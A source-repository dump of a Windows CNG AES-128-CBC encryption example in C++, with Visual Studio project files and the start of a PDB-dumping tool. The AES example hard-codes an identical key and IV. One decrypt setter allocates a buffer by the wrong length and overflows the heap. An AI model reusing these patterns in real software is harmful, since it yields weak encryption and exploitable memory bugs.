CNG::Util::WriteErrorMessage(L"First bcrypt!BCryptGetProperty failed\n");
return FALSE;
}
this->pbKeyObject = (PBYTE)::HeapAlloc(::GetProcessHeap(), 0, this->cbKeyObject);
ntStatus = ::BCryptGetProperty(this->hBcryptAlgHandle, BCRYPT_BLOCK_LENGTH, (PBYTE)(&this->cbBlockLen), sizeof(DWORD), &this->cbData, 0);
if (!NT_SUCCESS(ntStatus)) {
CNG::Util::WriteErrorMessage(L"Second bcrypt!BCryptGetProperty failed\n");
return FALSE;
}
if (this->cbBlockLen > sizeof(CNG::rgbIV))
return FALSE;
this->pbIV = (PBYTE)::HeapAlloc(::GetProcessHeap(), 0, this->cbBlockLen);
::RtlCopyMemory(this->pbIV, CNG::rgbIV, this->cbBlockLen);
ntStatus = ::BCryptSetProperty(this->hBcryptAlgHandle, BCRYPT_CHAINING_MODE, (PBYTE)BCRYPT_CHAIN_MODE_CBC, sizeof(BCRYPT_CHAIN_MODE_CBC), 0);
if (!NT_SUCCESS(ntStatus)) {
CNG::Util::WriteErrorMessage(L"bcrypt!BCryptSetProperty failed\n");
return FALSE;
}
CNG::Util::WriteInfoMessage(L"Call bcrypt!BCryptGenerateSymmetricKey\n", 3);
ntStatus = ::BCryptGenerateSymmetricKey(this->hBcryptAlgHandle, &this->hKeyHandle, this->pbKeyObject, this->cbKeyObject, (PBYTE)CNG::rgbAES128Key, sizeof(CNG::rgbAES128Key), 0);
if (!NT_SUCCESS(ntStatus)) {
CNG::Util::WriteErrorMessage(L"bcrypt!BCryptGenerateSymmetricKey failed\n");
return FALSE;
}
this->bIsInitialised = TRUE;
return this->bIsInitialised;
}
BOOL WINAPI AESEncrypt::SetBase64StringToEncrypt(std::string sPlaintext) {
if (!sPlaintext.empty()) {
std::vector<uint8_t> vec = Base64::Base64Decode(sPlaintext);
std::string tmp(vec.begin(), vec.end());
return this->SetStringToEncrypt(tmp);
}
CNG::Util::WriteErrorMessage(L"Enpty string provided");
return FALSE;
}
BOOL WINAPI AESEncrypt::SetStringToEncrypt(std::string sPlaintext) {
if (!sPlaintext.empty()) {
this->cbPlainText = (DWORD)sPlaintext.size();
this->pbPlainText = (PBYTE)::HeapAlloc(::GetProcessHeap(), 0, this->cbPlainText);
::RtlCopyMemory(this->pbPlainText, sPlaintext.c_str(), sPlaintext.size());
return TRUE;
}
CNG::Util::WriteErrorMessage(L"Enpty string provided");
return FALSE;
}
BOOL WINAPI AESDecrypt::SetStringToDecrypt(std::string sCipherText) {
if (!sCipherText.empty()) {
this->cbCipherText = (DWORD)sCipherText.size();
this->pbCipherText = (PBYTE)::HeapAlloc(::GetProcessHeap(), 0, this->cbPlainText);
::RtlCopyMemory(this->pbCipherText, sCipherText.c_str(), sCipherText.size());
return TRUE;
}
CNG::Util::WriteErrorMessage(L"Enpty string provided");
return FALSE;
}
BOOL WINAPI AESDecrypt::SetBase64StringToDecrypt(std::string sCipherText) {
if (!sCipherText.empty()) {
std::vector<uint8_t> vec = Base64::Base64Decode(sCipherText);
std::string tmp(vec.begin(), vec.end());
return this->SetStringToDecrypt(tmp);
}
CNG::Util::WriteErrorMessage(L"Enpty string provided");
return FALSE;
}
BOOL WINAPI AESEncrypt::Encrypt() {
NTSTATUS ntStatus = STATUS_UNSUCCESSFUL;
// Check that everything was set correctly
if (this->bAlreadyUsed)
return FALSE;
// Get the output buffer size to encrypt
CNG::Util::WriteInfoMessage(L"Call bcrypt!BCryptEncrypt\n", 3);
ntStatus = ::BCryptEncrypt(this->hKeyHandle, this->pbPlainText, this->cbPlainText, NULL, this->pbIV, this->cbBlockLen, NULL, 0, &this->cbCipherText, BCRYPT_BLOCK_PADDING);
if (!NT_SUCCESS(ntStatus)) {
CNG::Util::WriteErrorMessage(L"First bcrypt!BCryptEncrypt failed\n");
return FALSE;
}
CNG::Util::WriteInfoMessage(L"Call bcrypt!BCryptEncrypt\n", 3);
this->pbCipherText = (PBYTE)::HeapAlloc(::GetProcessHeap(), 0, this->cbCipherText);
ntStatus = ::BCryptEncrypt(this->hKeyHandle, this->pbPlainText, this->cbPlainText, NULL, this->pbIV, this->cbBlockLen, this->pbCipherText, this->cbCipherText, &this->cbData, BCRYPT_BLOCK_PADDING);
if (!NT_SUCCESS(ntStatus)) {
CNG::Util::WriteErrorMessage(L"Second bcrypt!BCryptEncrypt failed\n");
return FALSE;
}
// Destroy the key
CNG::Util::WriteInfoMessage(L"Call bcrypt!BCryptDestroyKey\n", 3);
ntStatus = ::BCryptDestroyKey(this->hKeyHandle);
if (!NT_SUCCESS(ntStatus)) {
CNG::Util::WriteErrorMessage(L"bcrypt!BCryptDestroyKey failed\n");
return FALSE;
}
this->bAlreadyUsed = TRUE;
return this->bAlreadyUsed;
}
BOOL WINAPI AESDecrypt::Decrypt() {
NTSTATUS ntStatus = STATUS_UNSUCCESSFUL;
// Check that everything was set correctly
if (this->bAlreadyUsed)
return FALSE;
CNG::Util::WriteInfoMessage(L"Call bcrypt!BCryptDecrypt\n", 3);
ntStatus = ::BCryptDecrypt(this->hKeyHandle, this->pbCipherText, this->cbCipherText, NULL, this->pbIV, this->cbBlockLen, NULL, 0, &this->cbPlainText, BCRYPT_BLOCK_PADDING);
if (!NT_SUCCESS(ntStatus)) {
CNG::Util::WriteErrorMessage(L"First bcrypt!BCryptDecrypt failed\n");
return FALSE;
}
CNG::Util::WriteInfoMessage(L"Call bcrypt!BCryptDecrypt\n", 3);
this->pbPlainText = (PBYTE)::HeapAlloc(::GetProcessHeap(), 0, this->cbPlainText);
ntStatus = ::BCryptDecrypt(this->hKeyHandle, this->pbCipherText, this->cbCipherText, NULL, this->pbIV, this->cbBlockLen, this->pbPlainText, this->cbPlainText , &this->cbData, BCRYPT_BLOCK_PADDING);
if (!NT_SUCCESS(ntStatus)) {
CNG::Util::WriteErrorMessage(L"Second bcrypt!BCryptDecrypt failed\n");
return FALSE;
}
// Destroy the key
CNG::Util::WriteInfoMessage(L"Call bcrypt!BCryptDestroyKey\n", 3);
ntStatus = ::BCryptDestroyKey(this->hKeyHandle);
if (!NT_SUCCESS(ntStatus)) {
CNG::Util::WriteErrorMessage(L"bcrypt!BCryptDestroyKey failed\n");
return FALSE;
}
this->bAlreadyUsed = TRUE;
return this->bAlreadyUsed;
}
std::string WINAPI AESEncrypt::GetEncryptedString() {
std::string tmp = (char*)this->pbCipherText;
return tmp;
}
std::string WINAPI AESEncrypt::GetEncryptedBase64String() {
std::string sCipherText;
if (this->pbCipherText)
sCipherText.append(Base64::Base64Encode(this->pbCipherText, this->cbCipherText));
return sCipherText;
}
std::string WINAPI AESDecrypt::GetDecryptedString() {
std::string tmp = (char*)this->pbPlainText;
return tmp;
}
std::string WINAPI AESDecrypt::GetDecryptedBase64String() {
std::string sPlaintext;
if (this->pbCipherText)
sPlaintext.append(Base64::Base64Encode(this->pbPlainText, this->cbPlainText));
return sPlaintext;
}
}
================================================
FILE: Cryptography/AES CNG/source/AES.h
================================================
#pragma once
#include <Windows.h>
#include <bcrypt.h>
namespace CNG {
static const BYTE rgbIV[] = {
0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07,
0x08, 0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F
};
static const BYTE rgbAES128Key[] = {
0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07,
0x08, 0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F
};
class AES {
public:
BOOL WINAPI Initialise();
protected:
~AES();
BCRYPT_ALG_HANDLE hBcryptAlgHandle = NULL;
BCRYPT_KEY_HANDLE hKeyHandle = NULL;
BOOL bIsInitialised = FALSE;
BOOL bAlreadyUsed = FALSE;
DWORD cbKeyObject = 0;
DWORD cbData = 0;
DWORD cbBlockLen = 0;
DWORD cbPlainText = 0;
DWORD cbCipherText = 0;
PBYTE pbKeyObject = NULL;
PBYTE pbIV = NULL;
PBYTE pbPlainText = NULL;
PBYTE pbCipherText = NULL;
};
class AESEncrypt : public AES {
public:
~AESEncrypt();
BOOL WINAPI Encrypt();
BOOL WINAPI SetStringToEncrypt(std::string sPlaintext);
BOOL WINAPI SetBase64StringToEncrypt(std::string sPlaintext);
std::string WINAPI GetEncryptedString();
std::string WINAPI GetEncryptedBase64String();
};
class AESDecrypt : public AES {
public:
~AESDecrypt();
BOOL WINAPI Decrypt();
BOOL WINAPI SetStringToDecrypt(std::string sCipherText);
BOOL WINAPI SetBase64StringToDecrypt(std::string sCipherText);
std::string WINAPI GetDecryptedString();
std::string WINAPI GetDecryptedBase64String();
};
}
================================================
FILE: Cryptography/AES CNG/source/AESCrypt.sln
================================================
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.29215.179
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "AESCrypt", "AESCrypt.vcxproj", "{3CB82A71-C96B-475D-B617-25924EB88631}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Custom|x64 = Custom|x64
Custom|x86 = Custom|x86
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{3CB82A71-C96B-475D-B617-25924EB88631}.Custom|x64.ActiveCfg = Custom|x64
{3CB82A71-C96B-475D-B617-25924EB88631}.Custom|x64.Build.0 = Custom|x64
{3CB82A71-C96B-475D-B617-25924EB88631}.Custom|x86.ActiveCfg = Custom|Win32
{3CB82A71-C96B-475D-B617-25924EB88631}.Custom|x86.Build.0 = Custom|Win32
{3CB82A71-C96B-475D-B617-25924EB88631}.Debug|x64.ActiveCfg = Debug|x64
{3CB82A71-C96B-475D-B617-25924EB88631}.Debug|x64.Build.0 = Debug|x64
{3CB82A71-C96B-475D-B617-25924EB88631}.Debug|x86.ActiveCfg = Debug|Win32
{3CB82A71-C96B-475D-B617-25924EB88631}.Debug|x86.Build.0 = Debug|Win32
{3CB82A71-C96B-475D-B617-25924EB88631}.Release|x64.ActiveCfg = Release|x64
{3CB82A71-C96B-475D-B617-25924EB88631}.Release|x64.Build.0 = Release|x64
{3CB82A71-C96B-475D-B617-25924EB88631}.Release|x86.ActiveCfg = Release|Win32
{3CB82A71-C96B-475D-B617-25924EB88631}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {D52A9CB7-A857-4CD4-BEE2-1CCB19802991}
EndGlobalSection
EndGlobal
================================================
FILE: Cryptography/AES CNG/source/AESCrypt.vcxproj
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Custom|Win32">
<Configuration>Custom</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Custom|x64">
<Configuration>Custom</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>16.0</VCProjectVersion>
<ProjectGuid>{3CB82A71-C96B-475D-B617-25924EB88631}</ProjectGuid>
<RootNamespace>AESCrypt</RootNamespace>
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Label="Configuration" Condition="'$(Configuration)|$(Platform)'=='Custom|Win32'">
<PlatformToolset>v142</PlatformToolset>
</PropertyGroup>
<PropertyGroup Label="Configuration" Condition="'$(Configuration)|$(Platform)'=='Custom|x64'">
<PlatformToolset>v142</PlatformToolset>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<IncludePath>C:\Program Files\OpenSSL-Win64\include\;$(IncludePath)</IncludePath>
<LibraryPath>C:\Program Files\OpenSSL-Win64\lib;$(LibraryPath)</LibraryPath>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<SDLCheck>true</SDLCheck>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<SDLCheck>true</SDLCheck>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<ConformanceMode>true</ConformanceMode>
<AdditionalIncludeDirectories>%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<MultiProcessorCompilation>false</MultiProcessorCompilation>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<AdditionalDependencies>%(AdditionalDependencies)</AdditionalDependencies>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="AES.cpp" />
<ClCompile Include="Main.cpp" />
<ClCompile Include="Util.cpp" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="AES.h" />
<ClInclude Include="Base64.h" />
<ClInclude Include="nthelpers.h" />
<ClInclude Include="Util.h" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>
================================================
FILE: Cryptography/AES CNG/source/AESCrypt.vcxproj.filters
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;hm;inl;inc;ipp;xsd</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="Main.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="Util.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="AES.cpp">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="AES.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="Util.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="nthelpers.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="Base64.h">
<Filter>Header Files</Filter>
</ClInclude>
</ItemGroup>
</Project>
================================================
FILE: Cryptography/AES CNG/source/Base64.h
================================================
#pragma once
#include <Windows.h>
#include <string>
#include <vector>
#include <openssl/bio.h>
#include <openssl/evp.h>
#include <openssl/buffer.h>
#pragma comment(lib, "libcrypto.lib")
size_t GetDecodedLength(std::string EncodedString) {
size_t len = EncodedString.size();
size_t padding = 0;
if (EncodedString[len - 1] == '=' && EncodedString[len - 2] == '=') {
padding = 2;
} else if (EncodedString[len - 1] == '=') {
padding = 1;
}
len = ((len * 3) / 4) - padding;
return len;
}
namespace Base64 {
std::string Base64Encode(PUCHAR input, int Length) {
BIO* bio = NULL;
BIO* b64 = NULL;
BUF_MEM* bPointer = NULL;
b64 = BIO_new(BIO_f_base64());
bio = BIO_new(BIO_s_mem());
bio = BIO_push(b64, bio);
BIO_set_flags(bio, BIO_FLAGS_BASE64_NO_NL);
BIO_write(b64, input, Length);
BIO_flush(bio);
BIO_get_mem_ptr(bio, &bPointer);
BIO_set_close(bio, BIO_NOCLOSE);
BIO_free_all(bio);
std::string result(bPointer->length, '\0');
RtlCopyMemory(&result[0], bPointer->data, bPointer->length);
BUF_MEM_free(bPointer);
return result;
}
std::vector<uint8_t> Base64Decode(std::string input) {
BIO* bio = NULL;
BIO* b64 = NULL;
bio = BIO_new_mem_buf(input.c_str(), -1);
b64 = BIO_new(BIO_f_base64());
bio = BIO_push(b64, bio);
BIO_set_flags(bio, BIO_FLAGS_BASE64_NO_NL);
size_t DecodedLength = GetDecodedLength(input);
std::vector<uint8_t> OriginalEncryptedValues(DecodedLength, 0);
BIO_read(bio, OriginalEncryptedValues.data(), static_cast<int>(DecodedLength));
BIO_free_all(bio);
return OriginalEncryptedValues;
}
}
================================================
FILE: Cryptography/AES CNG/source/Main.cpp
================================================
#pragma once
#ifndef WIN32_LEAN_AND_MEAN
#define WIN32_LEAN_AND_MEAN
#endif
#ifndef NOCOMM
#define NOCOMM
#endif
#include <Windows.h>
#include <iostream>
#include <ntstatus.h>
#include <vector>
#include "nthelpers.h"
#include "AES.h"
#include "Util.h"
std::string EasyEncrypt(std::string sPlaintext) {
CNG::Util::WriteInfoMessage(L"Initialising AESEncrypt object\n");
CNG::AESEncrypt* encrypt = new CNG::AESEncrypt();
if (encrypt->Initialise() == FALSE) {
CNG::Util::WriteErrorMessage(L"Unable to initialise AESEncrypt module\n");
return "";
}
// Encrypt the string
CNG::Util::WriteInfoMessage(L"Encrypt the string\n");
encrypt->SetStringToEncrypt(sPlaintext);
if (encrypt->Encrypt() == FALSE) {
CNG::Util::WriteErrorMessage(L"Error while encrypting the string\n");
return "";
}
// Get the base64 string
std::string sBase64String = encrypt->GetEncryptedBase64String();
// Cleanup
if (encrypt)
encrypt->~AESEncrypt();
return sBase64String;
}
std::string EasyDecrypt(std::string sCipherText) {
CNG::Util::WriteInfoMessage(L"Initialising AESDecrypt object\n");
CNG::AESDecrypt* decrypt = new CNG::AESDecrypt();
if (decrypt->Initialise() == FALSE) {
CNG::Util::WriteErrorMessage(L"Unable to initialise AESDecrypt module\n");
return "";
}
// Decrypt the string
CNG::Util::WriteInfoMessage(L"Decrypt the string\n");
decrypt->SetBase64StringToDecrypt(sCipherText);
if (decrypt->Decrypt() == FALSE) {
CNG::Util::WriteErrorMessage(L"Error while decrypting the string\n");
return "";
}
// Get the decrypted string
std::string sPlaintext = decrypt->GetDecryptedString();
// Cleanup
if (decrypt)
decrypt->~AESDecrypt();
return sPlaintext;
}
int wmain(int argc, wchar_t* argv[]) {
// Parameters are not used
UNREFERENCED_PARAMETER(argc);
UNREFERENCED_PARAMETER(argv);
CNG::Util::WriteInfoMessage(L"Windows Cryptography API Next Generation - Example\n");
CNG::Util::WriteInfoMessage(L"Documentation: https://docs.microsoft.com/en-us/windows/win32/seccng/cng-portal\n");
CNG::Util::WriteMessage(L" ---------------------------------------------------------------------------------\n\n");
std::string sPlaintext = "cum lux abest, tenebrae vincunt";
// Encrypt
std::string sB64CipherText = EasyEncrypt(sPlaintext);
CNG::Util::WriteSuccessMessage(L"Base64 cipher:\n");
std::cout << "\t" << sB64CipherText << std::endl << std::endl << std::endl;
// Decrypt
std::string sCipherTextDecrypted = EasyDecrypt(sB64CipherText);
CNG::Util::WriteSuccessMessage(L"Plaintext: \n");
std::cout << "\t" << sCipherTextDecrypted << std::endl;
return 1;
}
================================================
FILE: Cryptography/AES CNG/source/Util.cpp
================================================
#pragma once
#ifndef WIN32_LEAN_AND_MEAN
#define WIN32_LEAN_AND_MEAN
#endif
#ifndef NOCOMM
#define NOCOMM
#endif
#include <Windows.h>
#include <iostream>
#include "Util.h"
namespace CNG {
VOID WINAPI Util::WriteSuccessMessage(std::wstring wsBuffer) {
std::wcout << L"[+] ";
Util::WriteMessage(wsBuffer);
}
VOID WINAPI Util::WriteSuccessMessage(std::wstring wsBuffer, int tabs) {
for (int i = 0; i <= tabs; i++)
std::wcout << " ";
std::wcout << L"[+] ";
Util::WriteMessage(wsBuffer);
}
VOID WINAPI Util::WriteErrorMessage(std::wstring wsBuffer) {
std::wcout << L"[-] ";
Util::WriteMessage(wsBuffer);
}
VOID WINAPI Util::WriteErrorMessage(std::wstring wsBuffer, int tabs) {
for (int i = 0; i <= tabs; i++)
std::wcout << " ";
std::wcout << L"[-] ";
Util::WriteMessage(wsBuffer);
}
VOID WINAPI Util::WriteInfoMessage(std::wstring wsBuffer) {
std::wcout << L"[>] ";
Util::WriteMessage(wsBuffer);
}
VOID WINAPI Util::WriteInfoMessage(std::wstring wsBuffer, int tabs) {
for (int i = 0; i <= tabs; i++)
std::wcout << " ";
std::wcout << L"[>] ";
Util::WriteMessage(wsBuffer);
}
VOID WINAPI Util::WriteMessage(std::wstring wsBuffer) {
std::wcout << wsBuffer;
}
}
================================================
FILE: Cryptography/AES CNG/source/Util.h
================================================
#pragma once
#ifndef WIN32_LEAN_AND_MEAN
#define WIN32_LEAN_AND_MEAN
#endif
#ifndef NOCOMM
#define NOCOMM
#endif
#include <Windows.h>
namespace CNG {
class Util {
public:
static VOID WriteSuccessMessage(std::wstring wsBuffer);
static VOID WriteSuccessMessage(std::wstring wsBuffer, int tabs);
static VOID WriteErrorMessage(std::wstring wsBuffer);
static VOID WriteErrorMessage(std::wstring wsBuffer, int tabs);
static VOID WriteInfoMessage(std::wstring wsBuffer);
static VOID WriteInfoMessage(std::wstring wsBuffer, int tabs);
static VOID WriteMessage(std::wstring wsBuffer);
};
}
================================================
FILE: Cryptography/AES CNG/source/nthelpers.h
================================================
#pragma once
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
#define STATUS_UNSUCCESSFUL 0xC0000001
#define STATUS_INVALID_BUFFER_SIZE 0xC0000206
================================================
FILE: DIA/CMakeLists.txt
================================================
# @file CMakeLists.txt
# @data 13/06/2022
# @author Paul L. (@am0nsec)
# @version 1.0
# @brief Microsoft Debug Interface Access (DIA) CMake configuration file.
# @details
# @link https://github.com/am0nsec/wspe
# @copyright This project has been released under the GNU Public License v3 license.
include_directories(inc)
add_executable(dia-dump
"src/main.c"
"src/callback.c"
"src/interface.c"
"src/dirutil.c"
)
# Add all post-build commands
add_custom_command(
TARGET dia-dump
POST_BUILD
COMMAND ${CMAKE_COMMAND} -E echo "Start post-build commands"
# Make all the directories
COMMAND ${CMAKE_COMMAND} -E make_directory "${CMAKE_BINARY_DIR}/DIA/pdb"
COMMAND ${CMAKE_COMMAND} -E make_directory "${CMAKE_BINARY_DIR}/DIA/msdia"
# Copy binaries required
COMMAND ${CMAKE_COMMAND} -E copy "${CMAKE_SOURCE_DIR}/DIA/tools/symsrv.dll" "${CMAKE_BINARY_DIR}/DIA/pdb/"
COMMAND ${CMAKE_COMMAND} -E copy "${CMAKE_SOURCE_DIR}/DIA/tools/msdia140.dll" "${CMAKE_BINARY_DIR}/DIA/msdia/"
# End
COMMAND ${CMAKE_COMMAND} -E echo "Start post-build commands ... OK"
)
================================================
FILE: DIA/inc/callback.h
================================================
/*+================================================================================================
Module Name: callback.h
Author : Paul L. (@am0nsec)
Origin : https://github.com/am0nsec/wspe/
Copyright : This project has been released under the GNU Public License v3 license.
Abstract:
Abstraction of the Microsoft Debug Interface Access (DIA) SDK.
In this case this module contains the code for the CCallback COM interface implementation when loading PDB from
a PE EXE file.
Documentation available at: https://docs.microsoft.com/en-us/visualstudio/debugger/debug-interface-access/debug-interface-access-sdk
Most of the code is based on the Dia2Dump code sample shipped with the MS DIA SDK.
================================================================================================+*/
#ifndef __DIA_CALLBACK_H_GUARD__
#define __DIA_CALLBACK_H_GUARD__
#include <Windows.h>
#include "msdia/include/dia2.h"
typedef struct DiaCallback {
// Virtual Table for the callback
CONST_VTBL struct IDiaLoadCallback2* lpVtbl;
// Reference counter for the AddRef/Release methods
int m_nRefCount;
} DiaCallback;
HRESULT STDMETHODCALLTYPE
_Must_inspect_result_
_Success_(return == S_OK)
DiaCallbackHelper(
_In_ BOOLEAN Initialise,
_Inout_ PVOID** Callback
);
#endif // !__DIA_CALLBACK_H_GUARD__
================================================
FILE: DIA/inc/dirutil.h
================================================
/*+================================================================================================
Module Name: dirutil.h
Author : Paul L. (@am0nsec)
Origin : https://github.com/am0nsec/wspe/
Copyright : This project has been released under the GNU Public License v3 license.
Abstract:
Windows Directory utility code.
Used to change directory to the "PDB" folder and get the correct symbol server search path.
================================================================================================+*/
#ifndef __DIA_DIRUTIL_H_GUARD__
#define __DIA_DIRUTIL_H_GUARD__
#include <Windows.h>
_Must_inspect_result_
HRESULT ChangeDirectory(
_In_ PWCHAR Directory,
_In_ DWORD Size
);
_Must_inspect_result_
PWCHAR GetSymSrvSearchPath(
VOID
);
_Must_inspect_result_
PWCHAR GetMsdiaModulePath(
VOID
);
_Must_inspect_result_
HRESULT ResetDirectory(
VOID
);
#endif // !__DIA_DIRUTIL_H_GUARD__
================================================
FILE: DIA/inc/interface.h
================================================
/*+================================================================================================
Module Name: interface.h
Author : Paul L. (@am0nsec)
Origin : https://github.com/am0nsec/wspe/
Copyright : This project has been released under the GNU Public License v3 license.
Abstract:
Abstraction of the Microsoft Debug Interface Access (DIA) SDK.
Documentation available at: https://docs.microsoft.com/en-us/visualstudio/debugger/debug-interface-access/debug-interface-access-sdk
Most of the code is based on the Dia2Dump code sample shipped with the MS DIA SDK.
